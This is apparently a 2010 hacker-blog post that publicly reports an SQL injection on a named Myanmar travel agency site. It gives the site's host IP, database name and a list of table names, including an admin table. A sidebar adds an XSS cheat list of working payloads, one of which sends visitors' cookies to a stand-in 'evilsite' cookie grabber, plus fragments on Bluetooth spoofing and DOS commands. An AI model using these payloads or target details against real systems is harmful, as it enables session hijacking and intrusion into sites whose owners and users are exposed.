PlanetCreator has reported another critical SQL Injection (vulnerability) on Gulf Tranvels and Tours : Your reliable agency in Myanmar http://www.myanmartravelsgulf.com powered by IndexMyanmar

This vulnerability has been alerted to :- ” [email protected] , [email protected] , [email protected] , [email protected], [email protected],[email protected] , [email protected]

SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

Applications: ———— PlanetCreator’s_Universal_Advanced_Internet_Security_T00L
System Time: ———— (UTC+08:00) Yangoon, Myanmar , 18/09/2010 09:38:33 PM
Host IP: 198.68.161.4
Database: mmtravelsgulf

Some Tables are as follow :

gulf_welcome
gulf_visa
gulf_trip_info
gulf_trip
gulf_traveltips
gulf_transportation
gulf_route
gulf_rentcar_detail
gulf_rent_carinfo
gulf_rent_car
gulf_promotion
gulf_price
gulf_myanmar_cruise
gulf_jetty
gulf_hoteltype
gulf_hoteldetail
gulf_hotel_list
gulf_footer
gulf_flight_schedule
gulf_embassy
gulf_domestic
gulf_charter
gulf_car_service
gulf_car
gulf_boat
gulf_balloons
gulf_advertise
gulf_admin
gulf_aboutus 

We hope that your security staff will look into this issue and fix it as soon as possible.

Explore More

XSS Cheat List

<script>alert(1);</script> <script>alert('XSS');</script> <script src="http://www.evilsite.org/cookiegrabber.php"></script> <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script> <scr<script>ipt>alert('XSS');</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style> <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?> <marquee><script>alert('XSS')</script></marquee> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=\"jav ascript:alert('XSS');\"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> "><script>alert(0)</script> <script src=http://yoursite.com/your_files.js></script> </title><script>alert(/xss/)</script> </textarea><script>alert(/xss/)</script>

SpoofTooph 0.4 Release

Spooftooph is designed to automate spoofing or cloning Bluetooth device Name, Class, and Address. Cloning this information effectively allows Bluetooth device to hide in plain site. Bluetooth scanning software will

Basic MS-DOS commands

ADDUSERS – Add or list users to/from a CSV file ARP Address – Resolution Protocol ASSOC – Change file extension associations ASSOCIAT – One step file association AT – Schedule